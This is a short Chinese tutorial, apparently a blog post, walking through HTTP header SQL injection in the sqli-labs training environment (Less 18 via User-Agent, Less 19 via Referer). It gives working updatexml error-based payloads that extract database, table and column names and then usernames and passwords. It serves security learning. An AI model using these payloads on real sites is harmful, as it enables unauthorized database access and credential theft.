16、HTTP头注入(User-Agent、Referer)

简介: 16、HTTP头注入(User-Agent、Referer)

环境sqli-labs


less 18


1、在UA处输入特殊字符,报错

0a2653c851af460fa595bd959398a8f1.png0eacb84100b54626af849e6b562bf92a.png

2、构造输入语句,获取数据库名称

or updatexml(1,concat(’##’,(database())),0))#


2d65d23f6d4748949b924e4057485923.png2e9b90b2ca334476abebe75bafe6eeaa.png


3、获取表名

or updatexml(1,concat(’##’,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)),0))#

4cebaac233b3433da32a72337a77fc60.png6de278e6d6694ce5bb08e7e842b7e74b.png


4、获取字段

or updatexml(1,concat(’#’,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)),0))#


7a399525ddec4b77923c464820b33738 (1).png7a399525ddec4b77923c464820b33738.png


5、获取字段内容

or updatexml(1,concat(’#’,(select * from (select concat_ws(’#’,id,username,password) from users limit 0,1) a)),0))#


92ba0822ed0b46e1ae72df8a17d3a45b.png132ed0b65b344cf9a1fbe1887ab4ab6f.png


less 19


输入点在referer,注入语句同less 18


禁止非法,后果自负


目录
相关文章
|
9月前
|
安全 数据库
16、HTTP头注入(User-Agent、Referer)
16、HTTP头注入(User-Agent、Referer)
95 0
|
4月前
|
缓存 移动开发 安全
Web安全-HTTP响应拆分(CRLF注入)漏洞
Web安全-HTTP响应拆分(CRLF注入)漏洞
237 1
|
2月前
|
Web App开发 网络安全 数据安全/隐私保护
Lua中实现HTTP请求的User-Agent自定义
Lua中实现HTTP请求的User-Agent自定义
|
4月前
|
存储 Java 程序员
【HTTP】请求“报头”,Referer 和 Cookie
【HTTP】请求“报头”,Referer 和 Cookie
69 1
【HTTP】请求“报头”,Referer 和 Cookie
|
4月前
|
JSON 缓存 JavaScript
【HTTP】请求“报头”(Host、Content-Length/Content-Type、User-Agent(简称 UA))
【HTTP】请求“报头”(Host、Content-Length/Content-Type、User-Agent(简称 UA))
177 1
|
5月前
|
缓存 移动开发 安全
Web安全-HTTP响应拆分(CRLF注入)漏洞
Web安全-HTTP响应拆分(CRLF注入)漏洞
277 8
|
4月前
|
数据采集 Web App开发 数据安全/隐私保护
User-Agent在C++ HTTP请求中的作用
User-Agent在C++ HTTP请求中的作用
|
6月前
【Azure 云服务】Azure Cloud Service 为 Web Role(IIS Host)增加自定义字段 (把HTTP Request Header中的User-Agent字段增加到IIS输出日志中)
【Azure 云服务】Azure Cloud Service 为 Web Role(IIS Host)增加自定义字段 (把HTTP Request Header中的User-Agent字段增加到IIS输出日志中)
|
9月前
|
安全 数据库
小课堂 -- HTTP头注入(User-Agent、Refer)
小课堂 -- HTTP头注入(User-Agent、Refer)
85 0
|
安全 Apache 前端开发
HTTP Referer(页面统计/资源防盗链)
简介 HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的,服务器籍此可以获得一些信息用于处理。
1914 0